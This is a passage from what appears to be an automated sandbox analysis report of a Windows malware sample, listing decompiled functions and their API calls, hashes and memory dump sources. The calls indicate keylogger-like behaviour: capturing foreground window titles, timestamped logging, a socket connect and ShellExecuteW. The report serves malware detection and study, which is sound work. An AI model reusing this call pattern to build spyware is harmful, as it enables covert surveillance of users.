                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                • printf.MSVCRT ref: 00410D56
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                                • String ID: %02i:%02i:%02i:%03i $_E@
                                                • API String ID: 4249031962-1872662220
                                                • Opcode ID: 88925dc55fceafaa061dd905c36b120111623d63b4ade33133887d420b503e76
                                                • Instruction ID: 650f22449e15c5f6a49693175b54c46cd3b0f1625fb81580e18968f425ed9705
                                                • Opcode Fuzzy Hash: 88925dc55fceafaa061dd905c36b120111623d63b4ade33133887d420b503e76
                                                • Instruction Fuzzy Hash: 4B11CEB6800119ABCF01EFE0DC59DEF777CBE14706B044166F512E2091EA78D759C7A8
                                                Function 00404B80 Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401F9B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401FA9
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00404BC1
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404BD6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00404BE2
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00404C06
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404C1C
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404C25
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00404C3A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404C44
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288), ref: 00404C70
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00404C90
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404C7A
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288), ref: 00404CB1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00404CBB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00404CD1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404CE2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404CED
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00419288), ref: 00404D02
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                                • String ID:
                                                • API String ID: 257471410-0
                                                • Opcode ID: 7b2294950e61d3f105e2f52e542c652049d63aa2cdc1038fb8fcc5566dbc509b
                                                • Instruction ID: 6d36a47553fca4f1c2b8c1de80748eac5c045593e47cdd233237ecb5b217b3ab
                                                • Opcode Fuzzy Hash: 7b2294950e61d3f105e2f52e542c652049d63aa2cdc1038fb8fcc5566dbc509b
                                                • Instruction Fuzzy Hash: 58413372940109ABDB04FBA0ED5A9EE7738AB14305F14417EF902B31D2EB785F48CB99
                                                Function 00411B14 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(?,00419BC8,?,?,?,?,?,?,?,?,0040479C), ref: 00411B1C
                                                • GetWindowTextLengthA.USER32(00000000), ref: 00411B25
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411B3E
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B47
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B51
                                                • GetWindowTextA.USER32(00000000,00000000), ref: 00411B59
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B68
                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B72
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B7C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004139EC,?,00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B93
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411BA2
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00411BD3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411BFE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411C07
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C1C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411C4D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411C56
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                                • String ID:
                                                • API String ID: 3496238640-0
                                                • Opcode ID: 22fecc47be34c029da223a2c64e9df4d5a4e4396a9d7b6a97e03657b32791b24
                                                • Instruction ID: 97b51a4b8bf0942ac0b259d29a5eb31fefd9abc9c50281e5236a5333084e9804
                                                • Opcode Fuzzy Hash: 22fecc47be34c029da223a2c64e9df4d5a4e4396a9d7b6a97e03657b32791b24
                                                • Instruction Fuzzy Hash: 0D412C355000099BCB04EFA5DD5A9FE7BB8FB14306B104169E913A21E0EF349F49CBA9
                                                Function 0040D497 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00414970), ref: 0040D4AE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002), ref: 0040D4D5
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D4E8
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D503
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D50C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D523
                                                  • Part of subcall function 004119EF: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,75920F00,?,0040FC0A), ref: 004119FB
                                                  • Part of subcall function 004119EF: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040FC0A), ref: 00411A05
                                                  • Part of subcall function 004119EF: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411A19
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D538
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D545
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041496C), ref: 0040D568
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D580
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                                • String ID: open
                                                • API String ID: 3706242314-2758837156
                                                • Opcode ID: 6fed0283739a4e31c8ed875ab62fa894de339da74907f5b5862a37cfdfcf1eab
                                                • Instruction ID: d6ae3ac000f815bd1004c9d491e790d318b8a8b04895ff14f9f31fa0618b173f
                                                • Opcode Fuzzy Hash: 6fed0283739a4e31c8ed875ab62fa894de339da74907f5b5862a37cfdfcf1eab
                                                • Instruction Fuzzy Hash: A0312F76901115ABDF04BBE1EC5AAFE7728AF50706F1044BEF502F20E1EE785A44CB58
                                                Function 00404748 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 85sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00404791
                                                  • Part of subcall function 00411B14: GetForegroundWindow.USER32(?,00419BC8,?,?,?,?,?,?,?,?,0040479C), ref: 00411B1C
                                                  • Part of subcall function 00411B14: GetWindowTextLengthA.USER32(00000000), ref: 00411B25
                                                  • Part of subcall function 00411B14: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411B3E
                                                  • Part of subcall function 00411B14: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B47
                                                  • Part of subcall function 00411B14: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B51
                                                  • Part of subcall function 00411B14: GetWindowTextA.USER32(00000000,00000000), ref: 00411B59
                                                  • Part of subcall function 00411B14: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411B68
                                                  • Part of subcall function 00411B14: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B72
                                                  • Part of subcall function 00411B14: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B7C
                                                  • Part of subcall function 00411B14: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004139EC,?,00000000,?,?,?,?,?,?,?,?,0040479C), ref: 00411B93
                                                  • Part of subcall function 00411B14: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040479C), ref: 00411BA2
                                                  • Part of subcall function 00411B14: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00411BD3
                                                  • Part of subcall function 00411B14: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411BFE
                                                  • Part of subcall function 00411B14: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040479C), ref: 00411C07
                                                • Sleep.KERNEL32(000001F4), ref: 004047A8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 004047BF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 004047CF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004047DC
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004047EB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004047F4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004047FD
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404806
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404815
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00404833
                                                • Sleep.KERNEL32(00000064), ref: 00404847
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                                • String ID: [ $ ]
                                                • API String ID: 3011177377-93608704
                                                • Opcode ID: 45f15a580d94387fffb5f967b8669b08d21e36130fc863dbd682648ffeff480c
                                                • Instruction ID: 54256d600e784c7dd4488b2e5a388f0517066326aac255cad573213cfd23418f
                                                • Opcode Fuzzy Hash: 45f15a580d94387fffb5f967b8669b08d21e36130fc863dbd682648ffeff480c
                                                • Instruction Fuzzy Hash: B12169B5A001056BCB00BB65DC59AEF7B78AF45705F0040B9F702B31D2EF3856598B9D
                                                Function 0040512C Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 60timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                • sprintf.MSVCRT ref: 00405197
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051CD
                                                • SetEvent.KERNEL32(00000000), ref: 004051D6
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                Strings
                                                Memory Dump Source
